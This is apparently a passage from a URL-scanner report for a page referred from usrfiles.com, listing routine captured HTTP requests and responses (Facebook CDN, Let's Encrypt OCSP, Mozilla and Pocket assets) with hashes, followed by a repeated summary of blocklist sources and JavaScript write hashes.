ueeRT1nGEfsFxrl8N8qKep+c5vRYnATzqh2XnWfYhit2dm6Y1Ve2yHKI7PXl7BXBLgDXFs4s/e3jrWfIdtFnfg== content-length: 14813 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6639) Size: 14813 Md5: c28c4c6440e60fdbf3186720529a0e00 Sha1: a34f07fd571760cf5708d29230e04d338139c284 Sha256: d9f54cbf366941a3fd9b831a235a8bbf7ee52a101ea6fdd005c136b5af88e32a
GET /rsrc.php/y8/r/dF5SId3UHWd.svg HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: image/svg+xml vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 14 Mar 2024 17:22:00 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: NiMA5zHIsmaYxSYEaw9fHg== x-fb-debug: pKICp//t03kM7U99Wn4pipCy/ETFMZv4oeUwEvLQmAQWLcT6cn8SQkECbEG9XF+/wp23DkzeMhCXFadPuilfOg== content-length: 1027 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: SVG Scalable Vector Graphics image\012- HTML document text\012- HTML document, ASCII text, with very long lines (2384) Size: 1027 Md5: 362300e731c8b26698c526046b0f5f1e Sha1: 6cd41a329b54f1fb112080237f7fb4dc32d19a10 Sha256: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "55E47B413BA648A98EB6E92AB73AEE602912CD13E7DA23EF3CEA1490C1B9DE50" Last-Modified: Sun, 19 Mar 2023 18:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=5636 Expires: Wed, 22 Mar 2023 05:06:48 GMT Date: Wed, 22 Mar 2023 03:32:52 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 3462d41d9283fedf24f278089d5d1570 Sha1: b8bcea77656f775cdc34620322cc616216ed2b95 Sha256: 55e47b413ba648a98eb6e92ab73aee602912cd13e7da23ef3cea1490c1b9de50
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: swASHNt/Zlg8LjbmmkC6yA== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	52.41.156.90 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: lOYwjExWT3aU73vM0iu42KmVWzU= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C8FF32C6809A506D4C656D3200DBFC6682C156C3DE0647D13AB8F07A6F9A38BA" Last-Modified: Tue, 21 Mar 2023 15:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=7222 Expires: Wed, 22 Mar 2023 05:33:16 GMT Date: Wed, 22 Mar 2023 03:32:54 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: a0d3d7099bbc5fed74a6e78e1a3096bf Sha1: 96afaf8b3ac053577c56aca5f4a20d8655ecb771 Sha256: c8ff32c6809a506d4c656d3200dbfc6682c156c3de0647d13ab8f07a6f9a38ba
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F882a2ebf-b22a-46de-bf52-8b9a1aaa2743.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 8037 x-amzn-requestid: 7a9f7bb5-d810-4831-b5d2-3eead1af864a x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJprcGY1IAMFSAg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-53cdee4b645ed18e1dfeb92c;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: QW8T5AGg_L1mT4fE8IHeBG9TSiGpbBJpZE2yZdBtAQMJCPV8OKK5Dw== via: 1.1 a87682502db4b394cc6ba84510da9f98.cloudfront.net (CloudFront), 1.1 ae06b19943a6bad1c1b12b79f7339498.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:43:22 GMT age: 20972 etag: "8229b537f84a7418dc67e30691e62db4cea67f0f" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 8037 Md5: aeb0d8069d746e467fecd886c0e42628 Sha1: 8229b537f84a7418dc67e30691e62db4cea67f0f Sha256: 24705dc5b7eefd79a35323beee7c741aa041c3bf55801d13b4ffc2b202e6a394
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F5ceeeb08-532b-488e-be1c-b788708d76a2.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 5686 x-amzn-requestid: 8e5120a5-ecfd-4850-9560-a71e7bd1940c x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CHqH3GHwoAMFVSw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641956fe-0a1578d857aa27bb521b4292;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 07:04:30 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: OLBdDXSEiTByfiQh1PHhDVU8PDQa7F9Irau-RrOJWC88bFMMt1FrEA== via: 1.1 185f4b03b711932fc7e735c08fdc5abe.cloudfront.net (CloudFront), 1.1 618052a0d9c86c1a3bf663f82d041d1c.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 07:18:10 GMT etag: "2b6f011b911eb48604f22971afb21f61e4a14b70" age: 72884 cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 5686 Md5: 76347a0b2f0908b35321e7a53e5eb91c Sha1: 2b6f011b911eb48604f22971afb21f61e4a14b70 Sha256: ac892c186171836289a2ebd733ce96a2659d640f6408527bf8c6422ca31e713b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F844f3e97-b153-4a18-b087-e858f349c316.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 8979 x-amzn-requestid: 2ef93be0-3140-4ee5-82d7-a56e73350e9a x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJpraEVyoAMF4_Q= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-5ef93dc8183099e43c4679d9;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Hit from cloudfront x-amz-cf-id: bKtbsfvZ9ooTwHawEQd1g5a4uQQGQfLJWf_QhiFkwRgwhSvW4JbYSA== via: 1.1 ee32c7a76e2727d565413cc6c352ef48.cloudfront.net (CloudFront), 1.1 82c2ab57bc9900898383f6b70681b9e6.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:41:23 GMT age: 21091 etag: "d4e02105d3b968143681ee23ffe08443da8a7968" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 8979 Md5: d8ab9fe4465396637b9c70a873634f63 Sha1: d4e02105d3b968143681ee23ffe08443da8a7968 Sha256: 8f95b0a0bd72b13e993324d417e7a5b06803d9a506be2092a16054797e248982
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F08561a1f-1d19-45db-be98-107d6b1ed25d.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 10480 x-amzn-requestid: 58aa8272-4b4e-4a2f-9d6e-d47f70891c49 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJptHG7JoAMFSwA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2320-2fd6502b1271d5c13b4ebbe9;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:28 GMT x-amz-cf-pop: SEA19-C1, SEA19-C3 x-cache: Hit from cloudfront x-amz-cf-id: hqGFdT1Sk0IcvaNqfvjz5RsGBK-qMBcNKbK9FyZ7OoiH30hDL9ekxA== via: 1.1 2241406ac19fffc8f35d6ddef8e22f56.cloudfront.net (CloudFront), 1.1 de2dd11312f7d5ad3bcd0cb112c7fd0e.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:59:52 GMT age: 19982 etag: "5f7ea91288a2170bcabdca6be296718c4191eacd" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 10480 Md5: 6f0b9e85381489dcf646c251722b21d4 Sha1: 5f7ea91288a2170bcabdca6be296718c4191eacd Sha256: 911f803271ad9053ebac3787bdde9b75ec604acc6aa28692cc8e4c5c4fb61483
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7448874a-86d5-4c34-b675-b71037ef71ac.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 16968 x-amzn-requestid: 0b5d1157-e52b-4efe-8ce5-e11845b257b5 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJqOpHF1oAMFVjQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a23f7-38278f07532ce3fe0a52c114;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:39:03 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: tKfSiC95frj9or9ULZ2u30SCixukdMGR5QiVnY_A0I4AMOgsSxGjHw== via: 1.1 4e4278a2778e72cc34feef6db603088c.cloudfront.net (CloudFront), 1.1 219e8f088c8c2a564bdacafe44be620a.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 22:09:39 GMT age: 19395 etag: "de8b17bc7527517db4d2d0c5f0b77617969e8a55" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 16968 Md5: f5698f1af89c557551dfd0cb1c0d186a Sha1: de8b17bc7527517db4d2d0c5f0b77617969e8a55 Sha256: e80eef6ea76da09f35a588d77186f5110a0d8631646f73fb4aa1ecf7de751f13
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F255e6a5a-97bb-4a35-8a48-4d120747a63c.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 4000 x-amzn-requestid: 68dc01d7-3eed-48f6-8532-8efaa96cc1ec x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: CJpraEqyoAMFgNQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-641a2315-3852cc8961365a560d1fa02f;Sampled=0 x-amzn-remapped-date: Tue, 21 Mar 2023 21:35:17 GMT x-amz-cf-pop: HIO52-P1, SEA19-C3 x-cache: Miss from cloudfront x-amz-cf-id: 2e9Y7K5xIkpbhFR8a4kGAVX7X2-97lB13zHrjOuqlkalxzdbCDcfPA== via: 1.1 288c777a01e22425da9494dad7a69734.cloudfront.net (CloudFront), 1.1 abbf2df97f9d83839470842dc2e68cb6.cloudfront.net (CloudFront), 1.1 google date: Tue, 21 Mar 2023 21:41:23 GMT age: 21091 etag: "b798268806dc2f79f033e5872676019faf0e0cc1" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 4000 Md5: 85351059b67b0a42eda7e69a31b3b4b4 Sha1: b798268806dc2f79f033e5872676019faf0e0cc1 Sha256: 86e163b7159b197d6358ab01333ac6da221de0ebe1c5da8d5cef2977d38625fe
GET /security/hsts-pixel.gif HTTP/1.1 Host: facebook.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	157.240.205.35 HTTP/2 200 OK content-type: image/gif vary: Accept-Encoding content-encoding: br report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"} x-fb-rlafr: 0 content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT x-content-type-options: nosniff x-xss-protection: 0 x-frame-options: DENY access-control-allow-origin: strict-transport-security: max-age=15552000; includeSubDomains x-fb-debug: sU9aKejOI8YeWj0hLeD77+m375CWOLrASX8J7NId2YJO9j48ZjlBmH3TiGwb2Y6PGwvgfUfY13jJL4iVvj6i4g== date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: Sha1: Sha256:

Overview

Domain Summary (10)

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

ThreatFox

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 34.102.176.152

Last 5 reports on ASN: GOOGLE

Last 5 reports on domain: usrfiles.com

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (6)

#1 JavaScript::Write (size: 160) - SHA256: 8682340cb0d205cda72e51f1cd5fee72bf729866bbf18803cdff2e48db612492

#2 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

#3 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

#4 JavaScript::Write (size: 38504) - SHA256: 9ec05a015ce8f968f86dae09d3b4f08db66d82a8e81c697a3cb671315992ec9f

#5 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

#6 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

HTTP Transactions (37)

Overview

Domain Summary (10)

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

ThreatFox

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 34.102.176.152

Last 5 reports on ASN: GOOGLE

Last 5 reports on domain: usrfiles.com

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (6)

#1 JavaScript::Write (size: 160) - SHA256: 8682340cb0d205cda72e51f1cd5fee72bf729866bbf18803cdff2e48db612492

#2 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

#3 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

#4 JavaScript::Write (size: 38504) - SHA256: 9ec05a015ce8f968f86dae09d3b4f08db66d82a8e81c697a3cb671315992ec9f

#5 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

#6 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

HTTP Transactions (37)

Network Intrusion Detection Systems